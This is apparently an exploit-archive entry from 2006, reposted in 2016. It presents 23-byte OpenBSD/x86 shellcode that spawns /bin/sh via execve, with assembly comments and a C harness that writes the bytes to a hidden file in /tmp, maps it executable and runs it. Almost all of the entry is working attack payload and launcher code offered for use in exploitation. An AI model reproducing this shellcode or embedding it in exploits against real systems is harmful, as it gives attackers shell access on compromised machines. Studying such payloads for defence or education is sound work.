openbsd/x86 execve(/bin/sh) 23 bytes

2006-05-01T00:00:00
ID 1337DAY-ID-8234
Type zdt
Reporter hophet
Modified 2006-05-01T00:00:00

Description

Exploit for openbsd/x86 platform in category shellcode

                                        
                                            ====================================
openbsd/x86 execve(/bin/sh) 23 bytes
====================================




/*
 * [OpenBSD/x86]
 * Shellcode for: execve("/bin/sh", ["/bin/sh"], NULL)
 * 23 bytes
 */

#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mman.h>

#include <err.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
 
char shellcode[] =

"\x99"					/* cltd */
"\x52"					/* push	%edx */
"\x68\x6e\x2f\x73\x68"			/* push	$0x68732f6e */
"\x68\x2f\x2f\x62\x69"			/* push	$0x69622f2f */
"\x89\xe3"				/* mov	%esp,%ebx */
"\x52"					/* push	%edx */
"\x54"					/* push	%esp */
"\x53"                          	/* push	%ebx */
"\x53"					/* push	%ebx */
"\x6a\x3b"				/* push	$0x3b */
"\x58"					/* pop	%eax */
"\xcd\x80";				/* int	$0x80 */

/*
 * Since shellcode above will be mapped in .rodata (read-only protection),
 * we need to write it to a file and map the file with PROT_EXEC in order
 * to execute it.
 */

int main(void)
{
        void (*p)();
	int fd;
	
	fd=open("/tmp/. ", O_RDWR|O_CREAT, S_IRUSR|S_IWUSR);
	if(fd < 0)
		err(1, "open");
	
	write(fd, shellcode, strlen(shellcode));
	if((lseek(fd, 0L, SEEK_SET)) < 0)
		err(1, "lseek");

	p = (void (*)())mmap(NULL, strlen(shellcode), PROT_READ|PROT_EXEC, NULL, fd, NULL);
	if (p == (void (*)())MAP_FAILED)
		err(1, "mmap");
	p();
	return 0;
}



#  0day.today [2016-04-19]  #